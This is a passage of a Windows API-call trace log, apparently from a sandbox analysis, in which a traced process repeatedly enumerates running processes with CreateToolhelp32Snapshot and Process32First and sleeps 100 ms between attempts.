CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0263.571] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.790] Sleep (dwMilliseconds=0x64) [0263.876] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0263.885] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.183] Sleep (dwMilliseconds=0x64) [0264.278] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0264.345] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.418] Sleep (dwMilliseconds=0x64) [0264.437] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0264.453] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.566] Sleep (dwMilliseconds=0x64) [0264.609] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0264.687] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.809] Sleep (dwMilliseconds=0x64) [0264.870] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0264.968] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.059] Sleep (dwMilliseconds=0x64) [0265.172] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0265.187] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.308] Sleep (dwMilliseconds=0x64) [0265.363] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0265.379] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.624] Sleep (dwMilliseconds=0x64) [0265.664] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0265.761] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.878] Sleep (dwMilliseconds=0x64) [0265.926] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0265.974] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.156] Sleep (dwMilliseconds=0x64) [0266.205] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0266.215] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.291] Sleep (dwMilliseconds=0x64) [0266.330] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0266.362] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.436] Sleep (dwMilliseconds=0x64) [0266.452] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0266.463] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.730] Sleep (dwMilliseconds=0x64) [0266.767] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0266.780] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.912] Sleep (dwMilliseconds=0x64) [0266.927] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0266.945] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.097] Sleep (dwMilliseconds=0x64) [0267.165] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0267.277] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.448] Sleep (dwMilliseconds=0x64) [0267.497] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0267.515] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.631] Sleep (dwMilliseconds=0x64) [0267.639] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0267.650] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.924] Sleep (dwMilliseconds=0x64) [0268.032] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0268.041] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.267] Sleep (dwMilliseconds=0x64) [0268.278] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0268.290] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.376] Sleep (dwMilliseconds=0x64) [0268.423] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0268.432] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.588] Sleep (dwMilliseconds=0x64) [0268.640] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0268.651] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.729] Sleep (dwMilliseconds=0x64) [0268.732] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0268.743] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.801] Sleep (dwMilliseconds=0x64) [0268.843] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0268.852] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.074] Sleep (dwMilliseconds=0x64) [0269.128] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0269.156] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.332] Sleep (dwMilliseconds=0x64) [0269.342] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0269.366] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.493] Sleep (dwMilliseconds=0x64) [0269.545] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0269.556] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.685] Sleep (dwMilliseconds=0x64) [0269.776] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0269.790] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.961] Sleep (dwMilliseconds=0x64) [0270.056] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0270.219] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.348] Sleep (dwMilliseconds=0x64) [0270.394] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0270.409] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.595] Sleep (dwMilliseconds=0x64) [0270.611] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0270.620] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.692] Sleep (dwMilliseconds=0x64) [0270.702] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0270.712] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.890] Sleep (dwMilliseconds=0x64) [0270.940] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0270.951] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.073] Sleep (dwMilliseconds=0x64) [0271.099] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0271.111] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.177] Sleep (dwMilliseconds=0x64) [0271.234] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0271.299] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.524] Sleep (dwMilliseconds=0x64) [0271.583] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0271.596] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.729] Sleep (dwMilliseconds=0x64) [0271.779] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0271.797] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.927] Sleep (dwMilliseconds=0x64) [0272.005] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0272.019] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.190] Sleep (dwMilliseconds=0x64) [0272.231] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0272.241] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.338] Sleep (dwMilliseconds=0x64) [0272.345] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0272.362] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.432] Sleep (dwMilliseconds=0x64) [0272.483] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0272.495] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.766] Sleep (dwMilliseconds=0x64) [0272.829] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0272.844] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.987] Sleep (dwMilliseconds=0x64) [0273.059] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0273.072] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.166] Sleep (dwMilliseconds=0x64) [0273.213] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0273.248] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.327] Sleep (dwMilliseconds=0x64) [0273.394] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0273.409] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.493] Sleep (dwMilliseconds=0x64) [0273.534] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0273.630] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.896] Sleep (dwMilliseconds=0x64) [0273.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0273.931] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.008] Sleep (dwMilliseconds=0x64) [0274.106] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0274.118] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.269] Sleep (dwMilliseconds=0x64) [0274.314] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0274.324] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.414] Sleep (dwMilliseconds=0x64) [0274.471] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0274.481] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.588] Sleep (dwMilliseconds=0x64) [0274.595] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0274.611] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.746] Sleep (dwMilliseconds=0x64) [0274.799] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0274.812] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.111] Sleep (dwMilliseconds=0x64) [0275.170] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0275.182] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.259] Sleep (dwMilliseconds=0x64) [0275.262] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0275.274] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.340] Sleep (dwMilliseconds=0x64) [0275.398] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0275.413] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.535] Sleep (dwMilliseconds=0x64) [0275.581] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0275.594] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.738] Sleep (dwMilliseconds=0x64) [0275.814] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0275.824] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.903] Sleep (dwMilliseconds=0x64) [0275.973] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0275.987] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.222] Sleep (dwMilliseconds=0x64) [0276.269] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0276.284] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.414] Sleep (dwMilliseconds=0x64) [0276.418] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0276.428] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.494] Sleep (dwMilliseconds=0x64) [0276.499] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0276.509] Process32First (in: hSnapshot=0x9e0, lppe=0xff6fe20 